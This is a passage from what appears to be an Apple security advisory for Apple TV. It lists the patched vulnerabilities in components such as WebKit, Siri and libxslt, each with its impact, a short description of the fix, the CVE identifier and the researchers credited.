Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8660: Samuel Groß and natashenka of Google Project Zero

**Game Center**

Available for: Apple TV 4K and Apple TV HD

Impact: A local user may be able to read a persistent account identifier

Description: This issue was addressed with a new entitlement.

CVE-2019-8702: Min (Spark) Zheng and Xiaolong Bai of Alibaba Inc.

Entry added February 24, 2020

**Heimdal**

Available for: Apple TV 4K and Apple TV HD

Impact: An issue existed in Samba that may allow attackers to perform unauthorized actions by intercepting communications between services

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2018-16860: Isaac Boukris and Andrew Bartlett of the Samba Team and Catalyst

**Image Processing**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted image may lead to a denial of service

Description: A denial of service issue was addressed with improved validation.

CVE-2019-8668: an anonymous researcher

Entry added October 8, 2019

**libxslt**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to view sensitive information

Description: A stack overflow was addressed with improved input validation.

CVE-2019-13118: found by OSS-Fuzz

**Profiles**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to restrict access to websites

Description: A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement.

CVE-2019-8698: Luke Deshotels, Jordan Beichler, and William Enck of North Carolina State University; Costin Carabaș and Răzvan Deaconescu of University POLITEHNICA of Bucharest

**Quick Look**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker may be able to trigger a use-after-free in an application deserializing an untrusted NSDictionary

Description: This issue was addressed with improved checks.

CVE-2019-8662: natashenka and Samuel Groß of Google Project Zero

**Siri**

Available for: Apple TV 4K and Apple TV HD

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: natashenka of Google Project Zero

**UIFoundation**

Available for: Apple TV 4K and Apple TV HD

Impact: Parsing a maliciously crafted office document may lead to an unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8657: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of document loads. This issue was addressed with improved state management.

CVE-2019-8690: Sergei Glazunov of Google Project Zero

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management.

CVE-2019-8649: Sergei Glazunov of Google Project Zero

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8658: akayn working with Trend Micro's Zero Day Initiative

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8644: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8666: Zongming Wang (王宗明) and Zhe Jin (金哲) from Chengdu Security Response Center of Qihoo 360 Technology Co. Ltd.

CVE-2019-8669: akayn working with Trend Micro's Zero Day Initiative

CVE-2019-8671: Apple

CVE-2019-8672: Samuel Groß of Google Project Zero

CVE-2019-8673: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8676: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8677: Jihui Lu of Tencent KeenLab

CVE-2019-8678: Anthony Lai (@darkfloyd1014) of Knownsec, Ken Wong (@wwkenwong) of VXRL, Jeonghoon Shin (@singi21a) of Theori, Johnny Yu (@straight\_blast) of VX Browser Exploitation Group, Chris Chan (@dr4g0nfl4me) of VX Browser Exploitation Group, Phil Mok (@shadyhamsters) of VX Browser Exploitation Group, Alan Ho (@alan\_h0) of Knownsec, Byron Wai of VX Browser Exploitation, P1umer of ADLab of Venustech

CVE-2019-8679: Jihui Lu of Tencent KeenLab

CVE-2019-8680: Jihui Lu of Tencent KeenLab

CVE-2019-8681: G. Geshev working with Trend Micro Zero Day Initiative

CVE-2019-8683: lokihardt of Google Project Zero

CVE-2019-8684: lokihardt of Google Project Zero

CVE-2019-8685: akayn, Dongzhuo Zhao working with ADLab of Venustech, Ken Wong (@wwkenwong) of VXRL, Anthony Lai (@darkfloyd1014) of VXRL, and Eric Lung (@Khlung1) of VXRL

CVE-2019-8686: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8687: Apple

CVE-2019-8688: Insu Yun of SSLab at Georgia Tech

CVE-2019-8689: lokihardt of Google Project Zero

Entry updated September 11, 2019

Tag

#ios